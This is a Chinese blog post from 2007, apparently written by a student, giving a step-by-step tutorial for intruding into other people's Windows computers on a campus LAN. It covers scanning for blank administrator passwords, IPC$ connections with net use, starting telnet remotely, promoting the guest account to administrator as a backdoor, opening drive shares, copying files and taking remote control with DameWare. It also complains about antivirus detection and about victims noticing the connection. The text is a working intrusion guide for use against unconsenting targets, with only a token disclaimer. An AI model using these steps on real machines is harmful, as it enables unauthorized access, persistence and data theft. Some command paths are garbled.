局域网入侵 局域网入侵教程 局域网电脑入侵

来学校没事,看了些局域网电脑入侵的资料,加上自己实战经验(绝对没搞破坏,也没上传那些木马,这是一点的道德问题),总结出两种常用的入侵途径:

1.用139端口(IPC$)入侵 (我不常用,好像很难成功)

一.

先用"NTscan变态扫描器"扫描局域网某一网段(我这里只要是校园网内的就行)的IP,使用WMI扫描,端口139,得到一些弱口令(用户名为administrator,密码为空)的IP,使用cmd.exe,用net use IPIPC$ "" /user:administrator,但是绝大部分电脑都提示说:"发生系统错误 53。(wWW.niUbB.Net）找不到网络路径。"我想可能是被对方防火墙拦截了.只有极个别能连上.

net use 218.168.0.1IPC$ "" /user:administrator 提示“命令成功完成”,建立好了IPC$(远程管理连接) 二.

net time 192.168.0.1 显示远程主机的当前时间,显示时间为05:00

at 192.168.0.1 05:00 telnet 用at命令启动远程主机的telnet服务,但我用了可是没成功(也可用我得电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动,就OK了)

telnet 192.168.0.1 telnet上去

administrator 键入y后,输入的用户名,密码为空

三.

net user 查看用户,如:administrator,guest, HelpAssistant

net user guest /active:yes 激活guest用户

net user guest *** 更改guest的密码为***

net localgroup administrators guest /add 把guest的权限提升为管理员权限,为以后入侵留后门 四.

net share admin$ net share E$ 开共享,默认都是共享的

net share c$ /del 用来关闭共享的

net u** *192.168.0.1c$ "" /user:administrator 映射远程主机c$盘到本地x盘,这个我也没成功 五

使用"远程监控软件dameware"控制这台电脑.

六.

exit 断开远程主机的连接(没什么用,我都是直接关掉窗口的)

2.用23端口(telnet)入侵

一.(与上二大同)

先用"局域网查看工具V1.60"查看弱口令并开了23端口的,也可以只找到弱口令的主机,然后每个IP都按照电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动的方式开启telnet,再在cmd.exe中输入telnet IP,连不起的会出现"不能打开到主机的连接， 在端口 23: 连接失败",当然有些是开了23端口,但由于防火墙阻止了.

telnet 192.168.0.1 telent上去

administrator 输入y后,输入的用户名,密码为空

二.(同上三)

net user 查看用户 :administrator,guest, HelpAssistant

net user guest /active:yes 激活guest用户

net user guest **** 更改guest的密码为****

net localgroup administrators guest /add 把guest的权限提升为管理员权限

三.

局域网入侵教程 局域网电脑入侵

net share ipc$ net share admin$ net share E$ 开共享,默认都是共享的,ipc$一定要开,以便下一步net use 192.168.0.1IPC$ "" /user:administrator 建立IPC$(远程管理连接)

四.

使用"远程监控软件dameware"控制这台电脑.

附:

1.共享信息

net share e=e: 将远程主机的E盘共享, 访问时只需输入192.168.136.e

net share c=c:winntsystem 共享system文件夹

net share e /del 关闭E盘共享

2.telnet命令(DOS命令),在网上搜,太多了

dir d: 查看D盘 dir d:PROGRA~1 即program file文件夹,取前6个字母加上~符号,后面再加上数字1shutdown -s -t 60（60秒倒记时关机）opy复制文件 DEL删除 MKDIR创建目录 format格式化硬盘 IPCONFIG /ALL查看所有IP信息 NETSTAT -AN查看端口

3.ipc$常用命令,也在网上搜,也很多

copy c:x.exe 192.168.0.1c$ 即将c盘下的xinxin.exe复制到对方c盘内,这个我没弄成功

copy 192.168.0.1c$x.exe c: 将远程主机上的文件复制到自己的机器里

4.软件信息

一.远程开启telent服务的软件:"Recton--D贺免杀专用版",这个软件很好用,只需要远程主机IP和用户名密码,就可开telent,只可惜要被我金山毒霸杀掉,每次用它都要将实时防毒关掉.

二."远程监控软件dameware",这个软件很好,可以控制对方电脑就像在自己机子上操作一样,十分方便,具体教程网上去找,美中不足的是,每次连接上远程主机后,它都要在对方电脑上弹出连接提示窗口,还发出"当"的一声,除非对方又聋又瞎,不然都会被发现.(虽然我已把Additional Settings下的Enable SysTray Icon,和Notify Dialog下的Notify on Connection钩掉了都这样),所以着问题解决不了,这个软件就不要轻易使用.

三.端口扫描软件,这就太多了,网上一搜一大堆,也不晓得哪些好,我这里有"s扫描器","NTscan变态扫描器","流光5.0","hscan120扫描器"等

注:不要用来搞破坏哈.仅供娱乐!想上传木马的自己到网上找资料.

乱世狂人 2007.3.4

首发地址：http://user.qzone.***.com/164701150/blog/7